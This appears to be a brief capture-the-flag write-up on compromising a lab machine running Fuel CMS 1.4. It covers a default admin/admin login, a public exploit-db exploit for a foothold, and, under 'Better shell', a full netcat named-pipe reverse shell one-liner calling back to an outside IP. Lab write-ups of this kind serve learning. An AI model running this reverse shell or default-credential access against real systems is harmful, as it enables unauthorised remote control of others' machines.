NETWORK
SCAN
ENUMERATION
FOOTHOLD
Using the credentials admin / admin gives us access to the admin
We have found fuel 1.4
We have found an interesting exploit https://www.exploit-db/exploits/50477
Thanks to that script we have a way in the server
PRIV ESCALATION
Better shell
rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.8.28.34 1234 >/tmp/f
Root access
Using these credentials, we get a session as root
FLAGS
